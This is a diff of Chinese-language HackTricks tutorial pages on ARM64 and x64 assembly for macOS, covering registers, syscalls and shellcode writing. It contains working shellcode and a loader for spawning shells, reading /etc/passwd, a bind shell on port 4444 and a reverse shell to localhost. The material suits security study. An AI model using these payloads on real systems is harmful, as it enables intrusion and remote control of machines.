- **`AIF`**:可以使用位**`A`**`I``F`禁用某些异常。如果**`A`**为1则表示将触发**异步中止**。**`I`**配置为响应外部硬件**中断请求**IRQs。F与**快速中断请求**FIRs有关。
## macOS
@ -334,7 +332,7 @@ mov r0, #8
### Mach陷阱
在[**syscall_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall_sw.c.auto.html)中查看`mach_trap_table`,在[**mach_traps.h**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/mach/mach_traps.h)中查看原型。Mach陷阱的最大数量是`MACH_TRAP_TABLE_COUNT` = 128。Mach陷阱将具有**x16 < 0**因此您需要使用**负号**调用前面列表中的数字**`_kernelrpc_mach_vm_allocate_trap`** **`-10`**。
在[**syscall\_sw.c**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/kern/syscall\_sw.c.auto.html)中查看`mach_trap_table`,在[**mach\_traps.h**](https://opensource.apple.com/source/xnu/xnu-3789.1.32/osfmk/mach/mach\_traps.h)中查看原型。Mach陷阱的最大数量是`MACH_TRAP_TABLE_COUNT` = 128。Mach陷阱将具有**x16 < 0**因此您需要使用**负号**调用前一个列表中的数字**`_kernelrpc_mach_vm_allocate_trap`****`-10`**。
您还可以在反汇编器中检查**`libsystem_kernel.dylib`**以找出如何调用这些以及BSD系统调用
@ -349,7 +347,7 @@ dyldex -e libsystem_kernel.dylib /System/Library/Caches/com.apple.dyld/dyld_shar
{% endcode %}
{% hint style="success" %}
有时候检查来自`libsystem_kernel.dylib`的**反编译**代码比检查**源代码**更容易因为几个系统调用BSD和Mach的代码是通过脚本生成的请检查源代码中的注释而在dylib中您可以找到正在调用的内容。
有时候检查来自`libsystem_kernel.dylib`的**反编译**代码比检查**源代码**更容易因为几个系统调用BSD和Mach的代码是通过脚本生成的请检查源代码中的注释而在dylib中您可以找到正在调用的内容。
{% endhint %}
### machdep 调用
@ -368,9 +366,9 @@ XNU支持另一种称为机器相关调用的调用类型。这些调用的数
参数([更多信息请参阅文档](https://developer.apple.com/documentation/objectivec/1456712-objc\_msgsend)
* x0self -> 实例指针
* x1op -> 方法的选择器
* x2... -> 调用方法的其余参数
- x0self -> 实例指针
- x1op -> 方法的选择器
- x2... -> 调用方法的其余参数
因此如果在调用此函数之前设置断点您可以轻松地在lldb中找到调用的内容在此示例中对象调用`NSConcreteTask`中的对象,该对象将运行一个命令)。
```
@ -401,11 +399,18 @@ ld -o shell shell.o -syslibroot $(xcrun -sdk macosx --show-sdk-path) -lSystem
```
提取字节:
```bash
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh
for c in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done
```
对于更新的 macOS
```bash
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/fc0742e9ebaf67c6a50f4c38d59459596e0a6c5d/helper/extract.sh
for s in $(objdump -d "s.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n $s | awk '{for (i = 7; i > 0; i -= 2) {printf "\\x" substr($0, i, 2)}}'
done
```
<details>
<summary>用于测试shellcode的C代码</summary>
@ -461,7 +466,7 @@ return 0;
取自[**这里**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s)并进行解释。
{% tabs %}
{% tab title="with adr" %}
{% tab title="使用 adr" %}
```armasm
.section __TEXT,__text ; This directive tells the assembler to place the following code in the __text section of the __TEXT segment.
.global _main ; This makes the _main label globally visible, so that the linker can find it as the entry point of the program.
@ -525,9 +530,9 @@ svc #0x1337 ; Make the syscall. The number 0x1337 doesn't actually matter,
sh_path: .asciz "/bin/sh"
```
#### 使用cat命令读取
#### 使用 cat 命令读取
目标是执行`execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`因此第二个参数x1是一个参数数组在内存中意味着地址的堆栈
目标是执行 `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`,因此第二个参数 (x1) 是一个参数数组 (在内存中意味着地址的堆栈)
```armasm
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
@ -553,7 +558,7 @@ cat_path: .asciz "/bin/cat"
.align 2
passwd_path: .asciz "/etc/passwd"
```
#### 通过从fork中调用sh命令来执行命令以便主进程不被杀死
#### 通过从 fork 中调用 sh 命令来执行命令,以便主进程不被杀死
```armasm
.section __TEXT,__text ; Begin a new section of type __TEXT and name __text
.global _main ; Declare a global symbol _main
@ -599,7 +604,7 @@ touch_command: .asciz "touch /tmp/lalala"
```
#### 绑定 shell
从 [https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s) 获取在**端口 4444**上的绑定 shell
从 [https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s](https://raw.githubusercontent.com/daem0nc0re/macOS\_ARM64\_Shellcode/master/bindshell.s) 获取在**端口 4444**上的绑定 shell
```armasm
.section __TEXT,__text
.global _main
@ -756,7 +761,7 @@ svc #0x1337
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**

View file

@ -1,31 +1,31 @@
# Introduction to x64
# x64简介
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[NFTs收藏品](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>
## **x64简介**
x64也称为x86-64是一种64位处理器架构主要用于台式机和服务器计算。起源于由英特尔生产的x86架构后来被AMD采用并命名为AMD64是今天个人计算机和服务器中普遍采用的架构。
x64也称为x86-64是一种主要用于台式机和服务器计算的64位处理器架构。起源于由英特尔生产的x86架构后来被AMD采用并命名为AMD64是今天个人计算机和服务器中普遍采用的架构。
### **寄存器**
x64扩展了x86架构具有**16个通用寄存器**,标记为`rax`、`rbx`、`rcx`、`rdx`、`rbp`、`rsp`、`rsi`、`rdi`,以及`r8`到`r15`。每个寄存器可以存储**64位**8字节的值。这些寄存器还具有32位、16位和8位的子寄存器用于兼容性和特定任务。
1. **`rax`** - 传统上用于从函数中**返回值**
1. **`rax`** - 传统上用于从函数中返回值。
2. **`rbx`** - 经常用作内存操作的**基址寄存器**。
3. **`rcx`** - 通常用于**循环计数器**。
4. **`rdx`** - 用于各种角色,包括扩展算术运算。
4. **`rdx`** - 用于包括扩展算术运算在内的各种角色
5. **`rbp`** - 栈帧的**基指针**。
6. **`rsp`** - **栈指针**,跟踪栈的顶部。
7. **`rsi`** 和 **`rdi`** - 用于字符串/内存操作中的**源**和**目的**索引。
@ -35,10 +35,10 @@ x64扩展了x86架构具有**16个通用寄存器**,标记为`rax`、`rbx`
x64的调用约定在操作系统之间有所不同。例如
* **Windows**:前**四个参数**通过寄存器\*\*`rcx`**、**`rdx`**、**`r8`**和**`r9`**传递。进一步的参数被推送到栈上。返回值在**`rax`\*\*中。
* **System VUNIX-like系统中常用)**:前**六个整数或指针参数**通过寄存器\*\*`rdi`**、**`rsi`**、**`rdx`**、**`rcx`**、**`r8`**和**`r9`**传递。返回值也在**`rax`\*\*中。
* **Windows**:前**四个参数**通过寄存器**`rcx`**、**`rdx`**、**`r8`**和**`r9`**传递。额外的参数被推送到栈上。返回值在**`rax`**中。
* **System V在类UNIX系统中常用**:前**六个整数或指针参数**通过寄存器**`rdi`**、**`rsi`**、**`rdx`**、**`rcx`**、**`r8`**和**`r9`**传递。返回值也在**`rax`**中。
如果函数有超过六个输入,则**其余参数将传递到栈上**。**RSP**,栈指针,必须是**16字节对齐**这意味着在进行任何调用之前它指向的地址必须能被16整除。这意味着通常我们需要确保我们的shellcode在进行函数调用之前RSP被正确对齐。然而在实践中即使不满足这一要求系统调用往往也能正常工作。
如果函数有超过六个输入,则**其余参数将通过栈传递**。**RSP**栈指针,必须是**16字节对齐**这意味着在进行任何调用之前它指向的地址必须能被16整除。这意味着通常我们需要确保我们的shellcode在进行函数调用之前RSP被正确对齐。然而在实践中即使不满足这一要求系统调用也经常正常工作。
### Swift中的调用约定
@ -49,20 +49,20 @@ Swift有自己的**调用约定**,可以在[**https://github.com/apple/swift/b
x64指令具有丰富的集合保持与早期x86指令的兼容性并引入新指令。
* **`mov`**:将一个值从一个**寄存器**或**内存位置**移动到另一个。
* 示例:`mov rax, rbx` — 将`rbx`中的值移动到`rax`。
* 示例:`mov rax, rbx` — 将`rbx`中的值移动到`rax`。
* **`push`** 和 **`pop`**:将值推送到/从**栈**中弹出。
* 示例:`push rax` — 将`rax`中的值推送到栈上。
* 示例:`pop rax` — 将栈顶值弹出到`rax`中。
* 示例:`push rax` — 将`rax`中的值推送到栈上。
* 示例:`pop rax` — 将栈顶值弹出到`rax`中。
* **`add`** 和 **`sub`****加法**和**减法**操作。
* 示例:`add rax, rcx` — 将`rax`和`rcx`中的值相加,结果存储在`rax`中。
* 示例:`add rax, rcx` — 将`rax`和`rcx`中的值相加,并将结果存储在`rax`中。
* **`mul`** 和 **`div`****乘法**和**除法**操作。注意:这些操作对操作数的使用有特定行为。
* **`call`** 和 **`ret`**:用于**调用**和**从函数返回**。
* **`int`**:用于触发软件**中断**。例如在32位x86 Linux中`int 0x80`用于系统调用。
* **`cmp`**比较两个值并根据结果设置CPU的标志
* 示例:`cmp rax, rdx` — 比较`rax`和`rdx`。
* **`je`、`jne`、`jl`、`jge`等****条件跳转**指令,根据先前`cmp`或测试结果改变控制流。
* 示例:在`cmp rax, rdx`指令之后,`je label` — 如果`rax`等于`rdx`,则跳转到`label`。
* **`syscall`**在一些x64系统如现代Unix用于**系统调用**。
* **`cmp`**比较两个值并根据结果设置CPU的标志。
* 示例:`cmp rax, rdx` — 比较`rax`和`rdx`。
* **`je`、`jne`、`jl`、`jge`等****条件跳转**指令,根据先前`cmp`或测试结果改变控制流。
* 示例:在`cmp rax, rdx`指令之后,`je label` — 如果`rax`等于`rdx`,则跳转到`label`。
* **`syscall`**在一些x64系统如现代Unix用于**系统调用**。
* **`sysenter`**:在某些平台上优化的**系统调用**指令。
### **函数序言**
@ -76,13 +76,11 @@ x64指令具有丰富的集合保持与早期x86指令的兼容性并引入
1. **将当前基指针移动到栈指针**`mov rsp, rbp`(释放本地变量)
2. **从栈中弹出旧的基指针**`pop rbp`(恢复调用者的基指针)
3. **返回**`ret`(将控制返回给调用者)
## macOS
### 系统调用
有不同类别的系统调用,您可以在[**这里找到**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/osfmk/mach/i386/syscall\_sw.h)****
有不同类别的系统调用,你可以[**在这里找到它们**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/osfmk/mach/i386/syscall\_sw.h)**:**
```c
#define SYSCALL_CLASS_NONE 0 /* Invalid */
#define SYSCALL_CLASS_MACH 1 /* Mach */
@ -91,9 +89,7 @@ x64指令具有丰富的集合保持与早期x86指令的兼容性并引入
#define SYSCALL_CLASS_DIAG 4 /* Diagnostics */
#define SYSCALL_CLASS_IPC 5 /* Mach IPC */
```
然后,您可以在[**此网址中找到每个系统调用号**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**:**
然后,您可以在[**此网址**](https://opensource.apple.com/source/xnu/xnu-1504.3.12/bsd/kern/syscalls.master)**中找到每个系统调用号:**
```c
0 AUE_NULL ALL { int nosys(void); } { indirect syscall }
1 AUE_EXIT ALL { void exit(int rval); }
@ -110,25 +106,26 @@ x64指令具有丰富的集合保持与早期x86指令的兼容性并引入
12 AUE_CHDIR ALL { int chdir(user_addr_t path); }
[...]
```
因此,为了从**Unix/BSD类**调用`open`系统调用(**5**),您需要添加`0x2000000`
因此,为了从**Unix/BSD类**调用`open`系统调用(**5**),您需要将其添加为:`0x2000000`
因此调用open的系统调用号将是`0x2000005`
### Shellcodes
编译:
编译:
{% code overflow="wrap" %}
```bash
nasm -f macho64 shell.asm -o shell.o
ld -o shell shell.o -macosx_version_min 13.0 -lSystem -L /Library/Developer/CommandLineTools/SDKs/MacOSX.sdk/usr/lib
```
{% endcode %}
提取字节:
{% code overflow="wrap" %}
```bash
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/extract.sh
# Code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/b729f716aaf24cbc8109e0d94681ccb84c0b0c9e/helper/extract.sh
for c in $(objdump -d "shell.o" | grep -E '[0-9a-f]+:' | cut -f 1 | cut -d : -f 2) ; do
echo -n '\\x'$c
done
@ -141,42 +138,59 @@ otool -t shell.o | grep 00 | cut -f2 -d$'\t' | sed 's/ /\\x/g' | sed 's/^/\\x/g'
<details>
<summary>用于测试shellcode的C代码</summary>
```c
// code from https://github.com/daem0nc0re/macOS_ARM64_Shellcode/blob/master/helper/loader.c
// gcc loader.c -o loader
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
\`\`\`c // code from https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/helper/loader.c // gcc loader.c -o loader #include #include #include #include
int (*sc)();
int (\*sc)();
char shellcode[] = "<INSERT SHELLCODE HERE>";
char shellcode\[] = "";
int main(int argc, char **argv) {
printf("[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
int main(int argc, char \*\*argv) { printf("\[>] Shellcode Length: %zd Bytes\n", strlen(shellcode));
void *ptr = mmap(0, 0x1000, PROT_WRITE | PROT_READ, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
void \*ptr = mmap(0, 0x1000, PROT\_WRITE | PROT\_READ, MAP\_ANON | MAP\_PRIVATE | MAP\_JIT, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
printf("[+] SUCCESS: mmap\n");
printf(" |-> Return = %p\n", ptr);
if (ptr == MAP\_FAILED) { perror("mmap"); exit(-1); } printf("\[+] SUCCESS: mmap\n"); printf(" |-> Return = %p\n", ptr);
void *dst = memcpy(ptr, shellcode, sizeof(shellcode));
printf("[+] SUCCESS: memcpy\n");
printf(" |-> Return = %p\n", dst);
void \*dst = memcpy(ptr, shellcode, sizeof(shellcode)); printf("\[+] SUCCESS: memcpy\n"); printf(" |-> Return = %p\n", dst);
int status = mprotect(ptr, 0x1000, PROT_EXEC | PROT_READ);
int status = mprotect(ptr, 0x1000, PROT\_EXEC | PROT\_READ);
if (status == -1) {
perror("mprotect");
exit(-1);
}
printf("[+] SUCCESS: mprotect\n");
printf(" |-> Return = %d\n", status);
if (status == -1) { perror("mprotect"); exit(-1); } printf("\[+] SUCCESS: mprotect\n"); printf(" |-> Return = %d\n", status);
printf("[>] Trying to execute shellcode...\n");
printf("\[>] Trying to execute shellcode...\n");
sc = ptr;
sc();
sc = ptr; sc();
return 0; }
````
return 0;
}
```
</details>
#### Shell
取自[**这里**](https://github.com/daem0nc0re/macOS\_ARM64\_Shellcode/blob/master/shell.s)并进行解释。
<div data-gb-custom-block data-tag="tabs"></div>
<div data-gb-custom-block data-tag="tab" data-title='with adr'>
{% tabs %}
{% tab title="使用 adr" %}
```armasm
bits 64
global _main
@ -190,16 +204,31 @@ push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
````
```
{% endtab %}
\`\`\`armasm bits 64 global \_main
{% tab title="使用堆栈" %}
```armasm
bits 64
global _main
\_main: xor rdx, rdx ; zero our RDX push rdx ; push NULL string terminator mov rbx, '/bin/zsh' ; move the path into RBX push rbx ; push the path, to the stack mov rdi, rsp ; store the stack pointer in RDI (arg1) push 59 ; put 59 on the stack (execve syscall) pop rax ; pop it to RAX bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes) syscall
_main:
xor rdx, rdx ; zero our RDX
push rdx ; push NULL string terminator
mov rbx, '/bin/zsh' ; move the path into RBX
push rbx ; push the path, to the stack
mov rdi, rsp ; store the stack pointer in RDI (arg1)
push 59 ; put 59 on the stack (execve syscall)
pop rax ; pop it to RAX
bts rax, 25 ; set the 25th bit to 1 (to add 0x2000000 without using null bytes)
syscall
```
{% endtab %}
{% endtabs %}
````
#### 使用cat命令读取
#### 使用 cat 命令读取
目标是执行`execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`因此第二个参数x1是一个参数数组在内存中意味着地址的堆栈
目标是执行 `execve("/bin/cat", ["/bin/cat", "/etc/passwd"], NULL)`,因此第二个参数 (x1) 是一个参数数组 (在内存中意味着地址的堆栈)
```armasm
bits 64
section .text
@ -229,10 +258,8 @@ syscall ; Make the syscall
section .data
cat_path: db "/bin/cat", 0
passwd_path: db "/etc/passwd", 0
````
**使用sh调用命令**
```
#### 使用 sh 调用命令
```armasm
bits 64
section .text
@ -270,11 +297,9 @@ sh_path: db "/bin/sh", 0
sh_c_option: db "-c", 0
touch_command: db "touch /tmp/lalala", 0
```
#### 绑定 shell
**绑定shell**
绑定shell来自[https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) 在**端口4444**
绑定 shell 来自 [https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html](https://packetstormsecurity.com/files/151731/macOS-TCP-4444-Bind-Shell-Null-Free-Shellcode.html) 在 **端口 4444** 上。
```armasm
section .text
global _main
@ -349,11 +374,9 @@ mov rax, r8
mov al, 0x3b
syscall
```
#### 反向Shell
**反向Shell**
从[https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html)获取反向shell。反向shell连接到**127.0.0.1:4444**。
从[https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html](https://packetstormsecurity.com/files/151727/macOS-127.0.0.1-4444-Reverse-Shell-Shellcode.html)获取反向shell。反向shell连接到**127.0.0.1:4444**
```armasm
section .text
global _main
@ -415,7 +438,16 @@ mov rax, r8
mov al, 0x3b
syscall
```
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
</details>